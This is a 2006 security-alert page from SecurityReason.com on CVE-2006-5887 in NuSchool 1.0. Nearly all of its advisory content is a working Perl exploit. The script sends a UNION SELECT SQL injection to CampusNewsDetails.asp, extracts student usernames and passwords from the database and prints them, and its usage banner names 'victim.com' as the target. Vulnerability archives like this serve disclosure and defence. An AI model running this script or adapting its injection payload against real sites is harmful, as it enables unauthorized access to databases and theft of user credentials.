SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit


Arrow  SecurityAlert : 1855
Arrow  CVE : CVE-2006-5887
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : ajann
Arrow  Published : 15.11.2006

Arrow  Affected Software : NuSchool 1.0



Arrow  Advisory Content :  

#From:Filistin,Lubnan,IraQ,Turkey
#!/usr/bin/perl
#[Script Name: NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection
Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(

use IO::Socket;
if(@ARGV < 3){
print "
[=======================================================================
=
[// NuSchool 1.0 (CampusNewsDetails.asp) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [path] [userid]
[// Example: exploit.pl victim.com / 1
[// Example: exploit.pl victim.com /path/ 1
[// Vuln&Exp : ajann
[=======================================================================
=
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http://)//eg;
$host = "http://".$server;
$port = "80";
$dir = $ARGV[1];
$file = "CampusNewsDetails.asp?NewsID=";
$target =
"-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%
20StudentID%20like%20".$ARGV[2];
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+**********************************************************************
+n";
print "+ Trying to connect: $servern";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server",
PeerPort => "$port") || die "n+ Connection failed...n";
print $socket "GET $targetn";
print $socket "Host: $servern";
print $socket "Accept: */*n";
print $socket "Connection: closenn";
print "+ Connected!...n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /<td width="21%"><font size="2" face="Arial, Helvetica,
sans-serif">(.*?)</font>/){
print "+ Exploit succeed! Getting admin information.n";
print "+ ---------------- +n";
print "+ Username: $1n";
}

if ($answer =~ /<td colspan="2"><font size="2" face="Arial, Helvetica,
sans-serif">(.*?)</font>/){
print "+ Password: $1n";
exit();
}

if ($answer =~ /Ad removed or not yet approved/) {
print "+ Exploit Failed : ( n";
print
"+**********************************************************************
+n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( n";
print
"+**********************************************************************
+n";
exit();
}
}


print "+ Exploit failed :(n";
print
"+**********************************************************************
+n";





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.